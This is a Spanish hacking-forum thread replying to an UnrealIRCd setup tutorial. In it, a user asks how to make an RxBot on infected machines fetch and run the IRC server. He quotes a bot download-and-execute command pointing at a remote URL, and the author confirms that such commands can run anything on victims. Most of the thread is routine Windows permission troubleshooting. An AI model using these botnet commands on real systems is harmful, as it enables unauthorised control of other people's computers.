Buen Tuto y bien explicado.Ahora una pregunta,hay una manera de hacer correr el unreal en una maquina infectada a traves de comandos a un RxBot?Me explico:

Sabiendo la ip de la maquina infectada y poniendola en la configuracion y despues subiendo el unreal a un link para luego descargarlo y ejecutarlo a traves de comandos.

Ejemplo:
(Dandole esta orden al pc donde queramos instalar el ircd)
!dl http:megaupload.com/Unreal C:/Unreal.exe 1

Y despues conectando desde nuestro mirc a la ip de la maquina

/server xxx.xxx.xxx

Ya se que es mas facil a traves de VNC,pero me pregunto si con un bot como el rxbot se podria,si se puede no estaria mal un tuto sobre eso
p0is0n-123 escribió:Tabu te agradeceremos mas 2 limpios que 40 dudosos...
Tabu escribió:Buen Tuto y bien explicado.Ahora una pregunta,hay una manera de hacer correr el unreal en una maquina infectada a traves de comandos a un RxBot?Me explico:

Sabiendo la ip de la maquina infectada y poniendola en la configuracion y despues subiendo el unreal a un link para luego descargarlo y ejecutarlo a traves de comandos.

Ejemplo:
(Dandole esta orden al pc donde queramos instalar el ircd)
!dl http:megaupload.com/Unreal C:/Unreal.exe 1

Y despues conectando desde nuestro mirc a la ip de la maquina

/server xxx.xxx.xxx

Ya se que es mas facil a traves de VNC,pero me pregunto si con un bot como el rxbot se podria,si se puede no estaria mal un tuto sobre eso

Gracias al comando de descargar y/o ejecutar 1, puedes meterles lo que quieras y ejecutarselo, pero primero debes crear una carpeta y guardarle la config, trataré de aser un tutorial.

Mañana lo monto en linux y explico hbot, ando con pruebas y trabajos de universidad pero ya los are los tutoriales.

Saludos
~C0D1NG~
"C, Java, C#, ASP.NET...."
Imagen
Gracias ~T3RR0R~.Si tengo tiempo lo pondre en practica y si sale aportare un tutorial sobre ello.Salu2
p0is0n-123 escribió:Tabu te agradeceremos mas 2 limpios que 40 dudosos...
muchas gracias t3rror, lo he segido pero al iniciar le unreal me tira esto:
* Loading IRCd configuration ..
[error] Unable to create file 'tmp/720E6775.cloak.dll': Permission denied
* unrealircd.conf:1: loadmodule modules/cloak.dll: failed to load: Failed to copy module file.
[error] IRCd configuration failed to load


tengo cuenta de administrador, uso win7 x64
Imagen


Un sistema invulnerable es aquel sistema no construido.
kalimoro escribió:muchas gracias t3rror, lo he segido pero al iniciar le unreal me tira esto:
* Loading IRCd configuration ..
[error] Unable to create file 'tmp/720E6775.cloak.dll': Permission denied
* unrealircd.conf:1: loadmodule modules/cloak.dll: failed to load: Failed to copy module file.
[error] IRCd configuration failed to load


tengo cuenta de administrador, uso win7 x64
vas a la carpeta de unreal ircd y luego al ejecutable wircd debes darles permisos de administrador, sino al icono de unreal dale botn derecho despues ejecutar como administrador.
pruebas sino me agregas a msn y te ayudo, saludos..
~C0D1NG~
"C, Java, C#, ASP.NET...."
Imagen
~T3RR0R~ escribió: vas a la carpeta de unreal ircd y luego al ejecutable wircd debes darles permisos de administrador, sino al icono de unreal dale botn derecho despues ejecutar como administrador.
pruebas sino me agregas a msn y te ayudo, saludos..
gracias ahora si me funciona, gracias de verdad, pensaba que era por el win7 o por el uac
saludos
Imagen


Un sistema invulnerable es aquel sistema no construido.
kalimoro escribió:
~T3RR0R~ escribió: vas a la carpeta de unreal ircd y luego al ejecutable wircd debes darles permisos de administrador, sino al icono de unreal dale botn derecho despues ejecutar como administrador.
pruebas sino me agregas a msn y te ayudo, saludos..
gracias ahora si me funciona, gracias de verdad, pensaba que era por el win7 o por el uac
saludos

Bueno eso es un tipico error brot si no son los permisos, es la configuracion o el firewall molestando, pero es solucionable y facil de explicar.

Saludos
~C0D1NG~
"C, Java, C#, ASP.NET...."
Imagen
Estás hablando con un fantasma del pasado...! Tenía pelo en mi cabeza el 23 de Julio de 2010 que lástima de mi frondoso pelo
Por si no te has dado cuenta es un post del 2010 brother
Feliz Navidad ...!
Imagen
Responder

Volver a “Manuales y Tutoriales”